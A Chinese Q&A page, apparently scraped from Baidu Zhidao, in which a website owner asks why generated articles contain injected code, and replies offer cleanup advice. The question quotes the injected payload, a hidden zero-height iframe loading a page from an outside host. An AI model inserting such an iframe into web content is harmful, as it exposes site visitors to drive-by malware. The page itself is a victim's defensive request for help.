UC知道我的网站被加恶意代码
来源:百度知道 编辑:UC知道 时间:2024/06/21 09:06:13
我的一个VPS空间被加恶意代码,只要网站生成文章,所有文章在浏览查看源文件时发现都被写入<script>window.status=' '</script><iframe src="http://www.666500.net/1.htm?10" width="50" height="0"
frameborder="0"></iframe><script>window.status=' '</script>这个代码,但把这个文件下载下来查看源代码时又没有这段代码,这是怎么回事,请高手指点!!(以前生成的文章没有这个问题)
我反复查找了好几遍,都没找到包含恶意代码的JS文件,我用的是动易文章管理系统.
我查看应用程序日志文件,发现有好多用户是sshd_server,其IP来自印尼、印度
郑州等不同地方。
frameborder="0"></iframe><script>window.status=' '</script>这个代码,但把这个文件下载下来查看源代码时又没有这段代码,这是怎么回事,请高手指点!!(以前生成的文章没有这个问题)
我反复查找了好几遍,都没找到包含恶意代码的JS文件,我用的是动易文章管理系统.
我查看应用程序日志文件,发现有好多用户是sshd_server,其IP来自印尼、印度
郑州等不同地方。
你可以用用360
我想可以的
360安全卫士 恶意软件查杀
那是网络服务被监控了吧?申请浏览的时候才被修改代码吧
跟进去看了下,主要代码在1802270.js的脚本里,可以看到JS中用
document.write动态写进去的,保存的时候是保存包含HTML代码所以没有
有好几种原因,由于楼主说的不是很明白,分析如下
你的电脑里的释放该命令的病毒还没有清除
你的服务器里的有该病毒没有清除
你的网站程序中否个关键文件内含有该代码,还没有清除
原来我也碰到过一次这问题。我先重装电脑,然后用dw搜索该代码并删除,然后找js文件里是否有该代码